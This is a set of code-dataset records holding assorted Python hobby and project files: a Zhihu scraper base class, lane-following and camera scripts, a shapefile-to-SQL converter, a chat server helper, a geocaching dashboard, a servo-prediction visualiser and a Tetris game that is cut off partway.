self.conf[\"col\"]\r\n self.link = self.DB_link(self.conf[\"col_key\"])\r\n\r\n def DB_link(self, key):\r\n \"\"\"Mongo连接\"\"\"\r\n con = pymongo.MongoClient(*self.conf[\"link\"])\r\n if self.conf.get(\"authdb\", None):\r\n con[self.conf[\"authdb\"]].authenticate(*self.conf[\"auth\"])\r\n dbs = con.database_names()\r\n\r\n if self.db not in dbs:\r\n print(f\"| {self.db} created \")\r\n db = con[self.db]\r\n db[self.col].ensure_index(key, unique=True)\r\n return db\r\n\r\n def COL_save(self, data):\r\n \"\"\"数据存储方法\"\"\"\r\n db = self.link\r\n try:\r\n db[self.col].insert(data)\r\n except pymongo.errors.DuplicateKeyError as e:\r\n self.logger.info(e)\r\n except Exception as e:\r\n self.logger.info(e)\r\n\r\nclass bot(object):\r\n \"\"\"docstring for bot\"\"\"\r\n\r\n def __init__(self, mainurl):\r\n super(bot, self).__init__()\r\n self.mainurl = mainurl\r\n self.crawler = Anticrawler(source=mainurl)\r\n self.session = self.crawler.session\r\n self.logger = logging.getLogger(type(self).__name__)\r\n self.hotreload_file = f\"{type(self).__name__}.pkl\"\r\n self.raw_data_file = f\"{type(self).__name__}_raw.json\"\r\n self.raw_data = None\r\n self.raw_data_status = False\r\n self.maxpage = 0\r\n self.retrytimes = 3\r\n self.current_user = None\r\n self.randomUA = True\r\n\r\n def resp_check(self, resp, login=False):\r\n \"\"\"响应处理,429,403错误自动切换用户\"\"\"\r\n if self.randomUA:\r\n self.crawler.random_user_agent()\r\n netcode = resp.status_code\r\n if netcode == 200:\r\n return True\r\n\r\n def sleep_report(self, t):\r\n self.logger.info('Sleeping ... Until %s' % time.strftime(\r\n '%Y-%m-%d %H:%M:%S', time.localtime(time.time() + t)))\r\n time.sleep(t)\r\n\r\n def get_new_identity(self, broken_user=None, code=0):\r\n \"\"\"获取新身份\"\"\"\r\n pass\r\n\r\n def data_parser(self, *arg):\r\n \"\"\"数据抽取清洗收录\"\"\"\r\n _ = arg\r\n resdata = {}\r\n return resdata\r\n\r\n def hotreload_load(self):\r\n \"\"\"热启动\"\"\"\r\n if os.path.exists(self.hotreload_file):\r\n with open(self.hotreload_file, \"rb\") as f:\r\n try:\r\n self.session = pickle.load(f)\r\n self.crawler.session = self.session\r\n self.logger.info(\"Hotreload Compleate\")\r\n return True\r\n except Exception as e:\r\n self.logger.error(e)\r\n\r\n def hotreload_save(self):\r\n \"\"\"热启动配置存取\"\"\"\r\n with open(self.hotreload_file, \"wb\") as f:\r\n pickle.dump((self.session), f)\r\n self.logger.info(\"Hotreload File Saved\")\r\n return True\r\n\r\n def raw_data_save(self, data, filename=None):\r\n \"\"\"部分源数据存取\"\"\"\r\n filename = filename if filename else self.raw_data_file\r\n with open(filename, \"w\", encoding=\"utf8\") as f:\r\n f.write(dumps(data, indent=4, ensure_ascii=False))\r\n self.logger.info(\"Rawdata File Saved\")\r\n\r\n def html_data_save(self, html, name=\"test.html\"):\r\n with open(name, \"w\") as f:\r\n f.write(html)\r\n\r\n def sign_in(self):\r\n \"\"\"登录并获取凭证\"\"\"\r\n pass\r\n\r\n def reload_main_page(self):\r\n \"\"\"翻页爬行\"\"\"\r\n pass\r\n\r\n def get_data(self, format_url, format_data=None, types=\"\", params=None, extraheader=None):\r\n params = params if params else {}\r\n url = format_url if format_data is None else format_url.format(\r\n *format_data)\r\n self.logger.info(url)\r\n resp = self.session.get(url, params=params, headers=extraheader)\r\n resp.encoding = \"utf8\"\r\n if self.resp_check(resp):\r\n return self.data_parser(types, resp)\r\n else:\r\n self.logger.error(resp.status_code)\r\n\r\n \"\"\"获取指定目标数据\"\"\"\r\n pass\r\n\r\n def post_data(self, format_url, format_data=None, types=\"\", params=None, data=None, json=None,extraheader=None):\r\n params = params if params else {}\r\n url = format_url if format_data is None else format_url.format(\r\n *format_data)\r\n self.logger.info(url)\r\n resp = self.session.post(url, params=params, data=data, json=json,headers=extraheader)\r\n resp.encoding=\"utf8\"\r\n if self.resp_check(resp):\r\n return self.data_parser(types, resp)\r\n else:\r\n self.logger.error(resp.status_code)\r\n\r\n \"\"\"获取指定目标数据\"\"\"\r\n pass\r\n\r\n def start(self):\r\n \"\"\"启动\"\"\"\r\n pass\r\n\r\n def setproxy(self, uri):\r\n self.session.proxies = {\"https\": uri, \"http\": uri}\r\n\r\n\r\ndef save_worker(data, filename=\"res.pkl\"):\r\n with open(filename, \"wb\") as f:\r\n pickle.dump((data), f)\r\n\r\n\r\ndef load_worker(filename=\"res.pkl\"):\r\n with open(filename, \"rb\") as f:\r\n return pickle.load(f)\r\n","sub_path":"scrapyzhihu/public/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59743568","text":"import cv2\nimport sys\nfrom cobit_lane_follower import CobitLaneFollower\n\nvideo_file = sys.argv[1]\nlane_follower = CobitLaneFollower()\n\ncap = cv2.VideoCapture(video_file)\ni = 0\n\nwhile True:\n\tret, img_org = cap.read()\n\tif ret:\n\t\tlane_lines, img_lane = lane_follower.get_lane(img_org)\n\t\tcv2.imshow(\"ddd\", img_org)\n\t\tangle, img_lane = lane_follower.get_steering_angle(img_lane, lane_lines)\n\t\tif img_lane is None:\n\t\t\tpass\n\t\telse:\n\t\t\tcv2.imwrite(\"%s_%03d_%03d.png\" % (video_file, i, angle), img_org)\n\t\t\ti += 1\t\n\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\tbreak\n\telse:\n\t\tprint(\"cap error\")\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"old_code/lane_follower_3_get_label.py","file_name":"lane_follower_3_get_label.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"314196506","text":"import cv2\nimport multiprocessing\n\n\ndef camera1():\n global cap1\n cap1 = cv2.VideoCapture(0)\n while True:\n _, frame1 = cap1.read()\n cv2.imshow('frame1', frame1)\n\n k = cv2.waitKey(5)\n if k == 27:\n break\n cap1.release()\n\n\ndef camera2():\n global cap2\n cap2 = cv2.VideoCapture(0)\n while True:\n _, frame2 = cap2.read()\n cv2.imshow('frame2', frame2)\n\n k = cv2.waitKey(5)\n if k == 27:\n break\n cap2.release()\n\n\ndef cap_images():\n _, img1 = cap1.read()\n _, img2 = cap2.read()\n cv2.imwrite(\"Image1.png\", img1)\n cv2.imwrite(\"Image2.png\", img2)\n\n\nif __name__ == '__main__':\n p1 = multiprocessing.Process(target=camera1)\n p1.start()\n p2 = multiprocessing.Process(target=camera2)\n p2.start()\n\ncap1.release()\ncap2.release()\ncv2.destroyAllWindows()","sub_path":"dataset/merging.py","file_name":"merging.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"447033156","text":"#!/usr/bin/python3\r\n\r\nimport os\r\nimport re\r\nimport subprocess\r\n\r\nimport libs.pyshp.shapefile as shapefile\r\nimport fileHandlers.geojson as geojson\r\n\r\nfrom fileHandlers.geojson import GEOMETRY_COLUMN_SRID\r\nfrom fileHandlers.geojson import GEOMETRY_COLUMN_NAME\r\n\r\nfrom utils import ENCODERS_LIST\r\n\r\nfrom logs import Logs\r\nfrom logs import printLogs as print\r\n\r\ndef getShpProjection(file):\r\n # inegi projections\r\n inegiPrj = {\r\n \"4489\": [\"MEXICO_ITRF_1992_UTM_Zone_16N\"],\r\n \"4488\": [\"MEXICO_ITRF_1992_UTM_Zone_15N\"],\r\n \"4487\": [\"MEXICO_ITRF_1992_UTM_Zone_14N\"],\r\n \"4486\": [\"MEXICO_ITRF_1992_UTM_Zone_13N\"],\r\n \"4485\": [\"MEXICO_ITRF_1992_UTM_Zone_12N\"],\r\n \"4484\": [\"MEXICO_ITRF_1992_UTM_Zone_11N\"],\r\n \"6371\": [\"MEXICO_ITRF_2008_UTM_Zone_16N\"],\r\n \"6370\": [\"MEXICO_ITRF_2008_UTM_Zone_15N\"],\r\n \"6369\": [\"MEXICO_ITRF_2008_UTM_Zone_14N\"],\r\n \"6368\": [\"MEXICO_ITRF_2008_UTM_Zone_13N\"],\r\n \"6367\": [\"MEXICO_ITRF_2008_UTM_Zone_12N\"],\r\n \"6366\": [\"MEXICO_ITRF_2008_UTM_Zone_11N\"],\r\n \"6362\": [\"MEXICO_ITRF_1992_LCC\",\"North_America_Lambert_Conformal_Conic\"],\r\n \"6372\": [\"MEXICO_ITRF_2008_LCC\"]\r\n }\r\n\r\n # validate projection\r\n projFile = open(file).read().lower()\r\n\r\n srid = GEOMETRY_COLUMN_SRID\r\n for key in inegiPrj:\r\n for srs_name in inegiPrj[key]:\r\n if re.match(\".*\" + srs_name.lower() + \".*\", projFile) is not None:\r\n return key\r\n\r\n return srid\r\n\r\n\r\ndef process(file, datasetName, outputDir):\r\n sqlFilePath = \"{outputDir}/{script}.sql\".format(outputDir=outputDir, script=datasetName)\r\n\r\n # get shp projection\r\n srid = GEOMETRY_COLUMN_SRID\r\n\r\n projFileName = file[:-4] + \".prj\"\r\n\r\n if os.path.exists(projFileName):\r\n srid = getShpProjection(projFileName)\r\n\r\n for encoder in ENCODERS_LIST:\r\n try:\r\n print(\"Leyendo archivo\", {\"encoding\": encoder})\r\n reader = shapefile.Reader(file, encoding=encoder)\r\n fields = reader.fields[1:]\r\n field_names = [field[0] for field in fields]\r\n buffer = []\r\n for sr in reader.shapeRecords():\r\n atr = dict(zip(field_names, sr.record))\r\n geom = sr.shape.__geo_interface__\r\n buffer.append(dict(type=\"Feature\", geometry=geom, properties=atr))\r\n\r\n geojsonObject = {\r\n \"type\": \"FeatureCollection\",\r\n \"features\": buffer\r\n }\r\n\r\n geojson.writeSQLScript(file, datasetName, outputDir, geojsonObject=geojsonObject, srid=srid)\r\n\r\n return\r\n except UnicodeDecodeError as unicodeError:\r\n print(\"no se pudo leer el archivo\", Logs.ERROR, {\"error\": str(unicodeError)})\r\n else:\r\n print(\"no se encontro el archivo .prj\")\r\n","sub_path":"src/fileHandlers/shp.py","file_name":"shp.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"515849419","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nclass SendFirendMemebr(object):\n '''\n 用户登录成功后返给客户端的好友名称和群聊名称\n find_friend_table_name 通过用户名在数据库中查找当前用户的好友信息表名\n send_friend_info 向客户端发送好友名称和群聊名称\n '''\n\n def __init__(self, uname, connfd, addr, sql):\n self.uname = uname\n self.connfd = connfd\n self.addr = addr\n self.sql = sql\n\n # def find_friend_table_name(self):\n # sql_table = \"select username2 from friends where username1 = %s\"\n # tuple_table_name = self.sql.get_info(sql_table, [self.uname])\n # friend_table_name = tuple_table_name[0][0]\n # return friend_table_name\n\n def send_friend_info(self):\n\n sql = \"select username2 from friends where username1=%s\"\n firend_list = self.sql.get_info(sql, [self.uname])\n\n self.connfd.sendto(b'begin_send_friend_list', self.addr)\n\n if firend_list:\n for friend_name in firend_list:\n self.connfd.sendto(friend_name[0].encode(), self.addr)\n\n self.connfd.sendto(b'over_send_friend_list', self.addr)\n\n sql = \"select groupname from group_user where username=%s\"\n group_list = self.sql.get_info(sql, [self.uname])\n self.connfd.sendto(b'begin_send_group_list', self.addr)\n if group_list:\n for group_name in group_list:\n self.connfd.sendto(group_name[0].encode(), self.addr)\n # for group in set(group_list):\n # self.connfd.sendto(group.encode(), self.addr)\n self.connfd.sendto(b\"over_send_group_list\", self.addr)\n","sub_path":"AID1806项目/聊天室2/server10-13/send_friend_memebr.py","file_name":"send_friend_memebr.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628585611","text":"#!/usr/bin/env python\n\nimport os\nimport string\nimport time\nimport lib.gislib as gislib\nfrom lib.ledhandler import LedHandler, LED_ON, LED_OFF\nfrom lib.gpshandler import GpsHandler\nfrom lib.geocachefinder import GeocacheFinder\nfrom lib.geocachedisplay import GeocacheDisplay\nfrom lib.geocacheloader import GeocacheLoader\nfrom lib.tracklogexporter import TracklogExporter\nfrom lib.dashboard import Dashboard\nimport lib.databaseinit\nfrom pyspatialite import dbapi2 as spatialite\nfrom calendar import timegm\nimport ConfigParser\n\nconfig = ConfigParser.RawConfigParser({'MEASUREMENT_STANDARD': 'US', 'TIME_ZONE': 'US/Central'})\nconfig.read('cacheberrypi.cfg')\n\nMEASUREMENT_STANDARD = config.get('Settings', 'MEASUREMENT_STANDARD')\ntimezone = config.get('Settings', 'TIME_ZONE')\nSCROLL_SPEED = config.getint('Settings', 'DISPLAY_SCROLL_SPEED')\nGEOCACHE_SOURCE = config.get('Advanced', 'GEOCACHE_SOURCE')\nTRACKLOG_TARGET = config.get('Advanced', 'TRACKLOG_TARGET')\nTRACKLOG_EXPORT_TARGET = config.get('Advanced', 'TRACKLOG_EXPORT_TARGET')\nDATABASE_FILENAME = config.get('Advanced', 'DATABASE_FILENAME')\nLED_PINS = map(int,(config.get('Advanced', 'LED_PINS')).split(','))\nLED_SEARCH_STATUS = 2\nLED_CLOSE = 1\nos.environ['TZ'] = timezone # set environment variable TZ from 'timezone'\ntime.tzset() # set timezone in python to match the os timezone setting\n\ndef mainloop(led, gps, finder, geocache_display, dashboard):\n while 1:\n # grab current state from GPS and update finder location\n gps_state = gps.state()\n finder.update_position(gps_state['p'])\n finder.update_speed(gps_state['s'])\n finder.update_bearing(gps_state['b'])\n\n if MEASUREMENT_STANDARD == 'US': # convert speed from meters/sec to MPH or KPH\n speed = (gps_state['s'] * 2.23694)\n units = 'mph'\n elif units == 'METRIC':\n speed = (gps_state['s'] * 3.6)\n units = 'kph'\n else:\n raise ValueError('MEASUREMENT_STANDARD must be \"US\" or \"METRIC\"')\n\n try:\n clock = localize_time(time.strptime(gps_state['t'], '%Y-%m-%dT%H:%M:%S.000Z'))\n except:\n clock = None\n\n dashboard.update(\n clock,\n speed, \n gislib.humanizeBearing(gps_state['b']),\n units)\n\n # grab current closest cache \n closest = finder.closest()\n\n if closest:\n distance = gislib.getDistance(gps_state['p'], closest['position']) * 1000\n geocache_display.update(\n closest[\"description\"],\n closest[\"URL\"],\n gislib.humanizeBearing(gps_state['b']) if gps_state['s'] > 2 else '',\n gislib.humanizeBearing(gislib.calculateBearing(gps_state['p'], closest['position'])),\n distance,\n MEASUREMENT_STANDARD\n )\n\n geocache_display.show(distance < 1000) #if within 1km show in foreground (on top)\n\n # blink close light if we are not moving and within 100m or if we are moving and\n # our ETA is within 45 seconds.\n if (gps_state['s'] < 10 and distance < 100) or \\\n (gps_state['s'] >= 10 and (float(distance)/gps_state['s']) < 45):\n led.toggle(LED_CLOSE)\n else:\n led.set(LED_CLOSE, LED_ON)\n\n else:\n geocache_display.hide()\n\n time.sleep(.5)\n\ndef localize_time(utctime): # Converts a struct_time tuple from UTC to Local Time\n unixtime = timegm(utctime) # Convert utctime to seconds since the epoch\n localized_time = time.localtime(unixtime) # convert unixtime to a localized struct_time \n return localized_time\n \nif __name__=='__main__':\n\n if not os.path.exists(DATABASE_FILENAME):\n lib.databaseinit.create(DATABASE_FILENAME)\n\n led = LedHandler(LED_PINS)\n\n gps = GpsHandler(TRACKLOG_TARGET)\n gps.start()\n\n tracklogexport = TracklogExporter(TRACKLOG_TARGET, TRACKLOG_EXPORT_TARGET)\n tracklogexport.start()\n\n finder = GeocacheFinder(DATABASE_FILENAME, lambda: led.toggle(LED_SEARCH_STATUS))\n finder.start()\n\n geocache_display = GeocacheDisplay(SCROLL_SPEED)\n\n loader = GeocacheLoader(DATABASE_FILENAME, GEOCACHE_SOURCE, \n lambda: finder.pause(),\n lambda: finder.unpause())\n loader.start()\n\n dashboard = Dashboard()\n\n mainloop(led, gps, finder, geocache_display, dashboard)\n","sub_path":"cacheberrypi.py","file_name":"cacheberrypi.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"648025908","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ANIMESH BALA ANI\"\"\"\n\n# Import Modules\nimport os\nimport cv2\nimport math\n\nimport config\nfrom model import NvidiaNet\nfrom utils import load_checkpoint, single_prediction\n\n\n# Global Variables\nSOURCE_FOLDER = '../dataset/images/03_16_2020_0/output_0000'\nOUTPUT = 'output/output_0000.mp4'\nSHAPE = (360, 640) # height, width\nQUIT_KEY = ord('q')\nMAX_ANGLE = 90\nNEW_DATA = False\n\n\n# Functions\ndef draw_line(image, value, origin, angle, line_length, color, thiccness):\n cv2.line(image,\n (origin[0],\n origin[1]),\n (origin[0] - int(math.sin(angle*(5-value)/10)*line_length),\n origin[1] - int(math.cos(angle*(5-value)/10)*line_length)),\n color, thiccness)\n\n\ndef put_text(image, origin, target_color, predict_color, servo, servo_pred):\n \n image = cv2.putText(image,\n '{0:02d}'.format(servo),\n (origin[0] - 60, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, target_color, 3, cv2.LINE_AA) \n image = cv2.putText(image,\n \"(Target)\",\n (origin[0] - 200, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, target_color, 3, cv2.LINE_AA)\n image = cv2.putText(image,\n '{0:02d}'.format(servo_pred),\n (origin[0] + 15, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, predict_color, 3, cv2.LINE_AA)\n image = cv2.putText(image,\n \"(Predict)\",\n (origin[0] + 70, origin[1] + 40),\n cv2.FONT_HERSHEY_SIMPLEX, 1, predict_color, 3, cv2.LINE_AA)\n return image\n\n\n# Main Method\ndef main():\n origin = [SHAPE[1]//2, int(0.80*SHAPE[0])] # x,y\n line_length = SHAPE[0]//2\n thiccness = 10\n angle = math.pi*MAX_ANGLE/90\n target_color = (0,255,127)\n predict_color = (0,127,255)\n out = cv2.VideoWriter(OUTPUT, -1, 13, (SHAPE[1], SHAPE[0]))\n \n data = os.listdir(SOURCE_FOLDER)\n model = NvidiaNet(in_channels=3).to(config.DEVICE)\n load_checkpoint(config.CHECKPOINT, model)\n model.eval()\n \n for i in range(len(data)):\n image = cv2.imread(os.path.join(SOURCE_FOLDER, data[i]))\n if NEW_DATA:\n servo = int(data[i].split('_')[-3])\n else:\n servo = int(data[i].split('_')[-2][1:])\n\n servo_pred = single_prediction(model, image)\n \n image = cv2.resize(image, (SHAPE[1], SHAPE[0]), interpolation=cv2.INTER_CUBIC)\n \n # line and text display\n draw_line(image, servo, origin, angle, line_length, target_color, thiccness)\n draw_line(image, servo_pred, origin, angle, line_length, predict_color, thiccness)\n image = put_text(image, origin, target_color, predict_color, servo, servo_pred)\n \n # write image in video\n out.write(image)\n \n out.release()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"visualization/servo_prediction_video.py","file_name":"servo_prediction_video.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"71543573","text":"import pygame # learn more: https://python.org/pypi/Pygame\r\nimport random\r\nimport math\r\nimport time\r\nfrom itertools import cycle\r\npygame.init()\r\npixels = 20\r\nscore = 0\r\ndiff = 1\r\nclock = pygame.time.Clock()\r\nmusicChoice = \"Regular.mp3\"\r\nlines = 0\r\ngrid = []\r\ngridcolor = []\r\ntemparrayx = [0,0,0]\r\ntemparrayy = [0,0,0]\r\nscreen = pygame.display.set_mode((pixels * 10 + 100, pixels * 20))\r\nblockI = [\r\n [[0,0,0,0],\r\n [1,2,1,1],\r\n \r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,2,0,0],\r\n [0,1,0,0],\r\n [0,1,0,0]]\r\n \r\n ] \r\nblockL = [\r\n [[0,0,0,0],\r\n [1,2,1,0],\r\n [1,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[1,1,0,0],\r\n [0,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,0,1,0],\r\n [1,2,1,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,2,0,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n ] \r\nblockO = [\r\n [ [0,0,0,0],\r\n [0,2,1,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n \r\n ] \r\nblockS = [\r\n [ [0,0,0,0],\r\n [0,2,1,0],\r\n [1,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [1,0,0,0],\r\n [1,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n \r\n \r\n ] \r\nblockT = [\r\n [[0,0,0,0],\r\n [1,2,1,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,1,0,0],\r\n [1,2,0,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [1,2,1,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,1,0,0],\r\n [0,2,1,0],\r\n [0,1,0,0],\r\n [0,0,0,0]]\r\n ] \r\nblockZ = [\r\n [ [0,0,0,0],\r\n [0,1,2,0],\r\n [0,0,1,1],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,0],\r\n [0,0,2,1],\r\n [0,0,0,1],\r\n [0,0,0,0]]\r\n ]\r\n \r\nblockJ = [\r\n [[0,0,0,0],\r\n [0,1,2,1],\r\n [0,0,0,1],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,1],\r\n [0,0,2,0],\r\n [0,0,1,0],\r\n [0,0,0,0]]\r\n ,\r\n [[0,1,0,0],\r\n [0,1,2,1],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n ,\r\n [ [0,0,1,0],\r\n [0,0,2,0],\r\n [0,1,1,0],\r\n [0,0,0,0]]\r\n ]\r\n \r\n \r\nblocks = [blockI, blockL, blockO, blockS, blockT, blockZ, blockJ]\r\ncolors = [\"lightblue\", \"red\", \"orange\", \"yellow\", \"purple\" , \"green\" , \"blue\"]\r\nclass DisplayBlock:\r\n def __init__(self,b,color):\r\n self.blocks = []\r\n self.color = color\r\n self.rotation = b[0]\r\n for count in range(len(self.rotation)): # read rotation block\r\n for j in range(len(self.rotation[count])):\r\n if self.rotation[count][j] == 1:\r\n block = Block(j, count , self.color)\r\n self.blocks.append(block)\r\n if self.rotation[count][j] == 2:\r\n block = Block(j, count, self.color)\r\n self.blocks.append(block)\r\n def Render(self):\r\n \r\n for count in range(len(self.blocks)):\r\n screen.blit(self.blocks[count].surface, ((self.blocks[count].x + 10) * pixels , (self.blocks[count].y + 15) * pixels))\r\nclass TetrisBlock:\r\n def __init__(self,b,color):\r\n self.matrix = b\r\n self.blocks = []\r\n self.origin = 0\r\n self.counter = 0\r\n self.color = color\r\n self.rotation = self.matrix[self.counter]\r\n self.ReadRotation()\r\n self.CheckIt()\r\n self.origin.x = 5 # set in middle\r\n self.origin.y = 1\r\n self.oldx = 0\r\n self.oldy = 0\r\n self.SetDifference()\r\n def Render(self):\r\n screen.blit(self.origin.surface, (self.origin.x * pixels, self.origin.y * pixels))\r\n for count in range(len(self.blocks)):\r\n screen.blit(self.blocks[count].surface, ((self.blocks[count].x) * pixels , (self.blocks[count].y) * pixels))\r\n def CheckIt(self):\r\n for count in range(len(self.blocks)): # set difference \r\n self.blocks[count].diffx = self.origin.x - self.blocks[count].x\r\n self.blocks[count].diffy = self.origin.y - self.blocks[count].y\r\n def RotationCheck(self):\r\n canmove = True\r\n \r\n if(canmove):\r\n for count in range(len(self.blocks)):\r\n \r\n self.blocks[count].diffx = self.origin.x - self.blocks[count].x\r\n self.blocks[count].diffy = self.origin.y - self.blocks[count].y\r\n return True\r\n \r\n def GoDown(self):\r\n canmove = True\r\n try:\r\n if (grid[self.origin.y + 1][self.origin.x] != 1):\r\n pass\r\n else:\r\n canmove = False \r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y + 1][self.blocks[count].x] != 1):\r\n pass\r\n else:\r\n canmove = False\r\n if canmove: \r\n if (grid[self.origin.y + 1][self.origin.x] != 1):\r\n self.origin.y += 1\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y + 1][self.blocks[count].x] != 1):\r\n self.blocks[count].y += 1\r\n except IndexError:\r\n canmove = False\r\n return canmove \r\n def GoRight(self):\r\n yeet = True\r\n try:\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y][self.blocks[count].x +1] != 1):\r\n pass\r\n else:\r\n yeet = False\r\n break\r\n if (grid[self.origin.y][self.origin.x + 1] != 1 & yeet == True):\r\n self.origin.x += 1\r\n for count in range(len(self.blocks)): \r\n self.blocks[count].x += 1\r\n except IndexError:\r\n pass\r\n def GoLeft(self):\r\n yeet = True\r\n try:\r\n for count in range(len(self.blocks)):\r\n if (grid[self.blocks[count].y][self.blocks[count].x - 1] != 1 and self.blocks[count].x != 0): \r\n pass\r\n else:\r\n yeet = False \r\n break\r\n if (grid[self.origin.y][self.origin.x - 1] != 1 & yeet == True):\r\n self.origin.x += -1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += -1\r\n except IndexError:\r\n pass\r\n def SetDifference(self):\r\n needToMove = False\r\n needToMoveLeft = False\r\n canmove = True\r\n flipit = True\r\n for count in range(len(self.blocks)): # set difference\r\n try:\r\n if(grid[self.origin.y + self.blocks[count].diffy][self.origin.x + self.blocks[count].diffx] != 0):\r\n canmove = False\r\n flipit = False\r\n except IndexError:\r\n pass\r\n if(flipit == False):\r\n if(self.counter == len(self.matrix) - 1):\r\n self.counter = 0\r\n self.rotation = self.matrix[self.counter]\r\n if(self.counter == 0):\r\n self.counter = len(self.matrix) - 1\r\n self.rotation = self.matrix[self.counter]\r\n \r\n self.ReadRotation()\r\n \r\n for count in range(len(self.blocks)):\r\n \r\n self.blocks[count].x = temparrayx[count]\r\n self.blocks[count].y = temparrayy[count]\r\n self.origin.x = self.oldx\r\n self.origin.y = self.oldy \r\n \r\n \r\n if(canmove):\r\n for count in range(len(self.blocks)): # set difference\r\n \r\n \r\n self.blocks[count].x = self.origin.x + self.blocks[count].diffx\r\n self.blocks[count].y = self.origin.y + self.blocks[count].diffy\r\n if self.blocks[count].x == 10:\r\n needToMove = True\r\n if self.blocks[count].x == -1:\r\n needToMoveLeft = True\r\n if needToMove == True:\r\n self.origin.x += -1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += -1\r\n if needToMoveLeft == True:\r\n self.origin.x += 1\r\n for count in range(len(self.blocks)):\r\n self.blocks[count].x += 1\r\n return True\r\n def ReadRotation(self): # make sure to reset origin\r\n \r\n self.blocks = []\r\n \r\n \r\n for count in range(len(self.rotation)): # read rotation block\r\n for j in range(len(self.rotation[count])):\r\n if self.rotation[count][j] == 1:\r\n block = Block(j, count , self.color)\r\n self.blocks.append(block)\r\n if self.rotation[count][j] == 2:\r\n block = Block(j, count, self.color)\r\n self.origin = block\r\n \r\n def RotateLeft(self):\r\n for count in range(len(self.blocks)):\r\n \r\n temparrayx[count] = self.blocks[count].x\r\n temparrayy[count] = self.blocks[count].y\r\n self.counter += -1\r\n \r\n if self.counter == -1:\r\n self.counter = len(self.matrix) - 1\r\n self.rotation = self.matrix[self.counter] \r\n tempx = self.origin.x\r\n tempy = self.origin.y\r\n self.oldy = self.origin.y\r\n self.oldx = self.origin.x\r\n self.ReadRotation()\r\n asd = self.RotationCheck()\r\n \r\n self.origin.x = tempx\r\n self.origin.y = tempy\r\n self.SetDifference()\r\n \r\n def RotateRight(self):\r\n for count in range(len(self.blocks)):\r\n \r\n temparrayx[count] = self.blocks[count].x\r\n temparrayy[count] = self.blocks[count].y\r\n self.counter += 1\r\n if self.counter == len(self.matrix):\r\n self.counter = 0\r\n self.rotation = self.matrix[self.counter] \r\n tempx = self.origin.x\r\n tempy = self.origin.y\r\n \r\n self.ReadRotation()\r\n asd = self.RotationCheck()\r\n \r\n self.origin.x = tempx\r\n self.origin.y = tempy\r\n self.SetDifference()\r\n \r\n def HardDrop(self):\r\n global diff, score\r\n go = True\r\n asd = 0\r\n while go:\r\n go = self.GoDown()\r\n asd += 10 * diff\r\n score += asd\r\n return go\r\n\r\n def SetGrid(self):\r\n grid[self.origin.y][self.origin.x] = 1\r\n gridcolor[self.origin.y][self.origin.x] = self.origin.surface\r\n for count in range(len(self.blocks)):\r\n grid[self.blocks[count].y][self.blocks[count].x] = 1\r\n gridcolor[self.blocks[count].y][self.blocks[count].x] = self.blocks[count].surface\r\nclass Block:\r\n def __init__(self, x,y,color):\r\n self.x = x\r\n self.y = y\r\n self.diffx = 0\r\n self.diffy = 0\r\n self.surface = pygame.image.load(color+\".png\")\r\n self.oldDiffx = 0\r\n self.oldDiffy = 0 \r\ndef End(cBlock):\r\n asd = False\r\n for counter in range(len(cBlock.blocks)):\r\n if grid[cBlock.blocks[counter].y][cBlock.blocks[counter].y] == 1:\r\n asd = True\r\n if grid[cBlock.origin.y][cBlock.origin.x] == 1:\r\n asd = True\r\n return asd\r\ndef CheckLines():\r\n global lines, score, diff\r\n yeet = True\r\n asd = 0\r\n ds = []\r\n for counter in range(len(grid)):\r\n for j in range(len(grid[counter])):\r\n if grid[counter][j] != 1:\r\n yeet = False\r\n \r\n if yeet == True:\r\n lines += 1\r\n asd += 1\r\n ds.append(counter)\r\n for i in range(10):\r\n grid[counter][i] = 0\r\n yeet = True\r\n \r\n if(asd != 0):\r\n if asd == 4:\r\n 